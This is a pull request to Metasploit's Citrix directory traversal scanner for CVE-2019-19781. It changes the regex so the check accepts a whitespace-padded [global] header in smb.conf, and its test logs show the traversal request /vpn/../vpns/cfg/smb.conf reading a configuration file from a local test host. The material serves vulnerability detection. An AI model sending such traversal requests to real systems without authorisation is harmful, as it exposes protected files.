### PR TITLE
Check for whitespace in [global] directive for Citrix

### DIFF
--- a/modules/auxiliary/scanner/http/citrix_dir_traversal.rb
+++ b/modules/auxiliary/scanner/http/citrix_dir_traversal.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if turi.end_with?('smb.conf')
-      unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.include?('[global]')
+      unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\[\s*global\s*\]/)
         vprint_warning("#{turi} does not contain \"[global]\" directive.")
       end
     end


### PR DESCRIPTION
Fixes #12813.

```
21m  wvu  We updated our check to look for [global] instead of just global
21m  wvu  But I am not sure if whitespace is allowed around the brackets
21m  wvu  Largely why I left it off in the first place
21m  wvu  But it is worth checking
```

And from @smcintyre-r7: https://github.com/python/cpython/blob/master/Lib/configparser.py#L564-L568.

```
bash-5.0# grep global /etc/samba/smb.conf
[ global ]
bash-5.0#
```

```
wvu@kharak:~$ python /usr/local/bin/smbclient.py localhost
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Type help for list of commands
# shares
IPC$
#
```

```
smbd version 4.10.10 started.
Copyright Andrew Tridgell and the Samba Team 1992-2019
daemon_ready: daemon 'smbd' finished starting up and ready to serve connections
```

```
>>> re.match(r"\[(?P<header>[^]]+)\]", "[global]")
<re.Match object; span=(0, 8), match='[global]'>
>>> re.match(r"\[(?P<header>[^]]+)\]", "[ global ]")
<re.Match object; span=(0, 10), match='[ global ]'>
>>> re.match(r"\[(?P<header>[^]]+)\]", " [ global ] ")
>>> re.match(r"\[(?P<header>[^]]+)\]", "global")
>>>
```

```
irb(main):001:0> '[global]'.match(/\[\s*global\s*\]/)
=> #<MatchData "[global]">
irb(main):002:0> '[ global ]'.match(/\[\s*global\s*\]/)
=> #<MatchData "[ global ]">
irb(main):003:0> ' [ global ] '.match(/\[\s*global\s*\]/)
=> #<MatchData "[ global ]">
irb(main):004:0> 'global'.match(/\[\s*global\s*\]/)
=> nil
irb(main):005:0>
```

```
msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 17:30:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 12 Jan 2020 22:27:43 GMT
ETag: "53-59bf8de0ad5c0"
Accept-Ranges: bytes
Content-Length: 83
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
```

```
root@[redacted]# cat smb.conf
[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast
root@[redacted]# cp smb.conf smb.conf.orig
root@[redacted]# sed -i "" 's/\[global\]/[ global ]/' smb.conf
root@[redacted]# cat smb.conf
[ global ]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast
root@[redacted]#
```

```
msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 17:33:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 14 Jan 2020 17:32:39 GMT
ETag: "55-59c1cfa7bfbc0"
Accept-Ranges: bytes
Content-Length: 85
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[ global ]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
```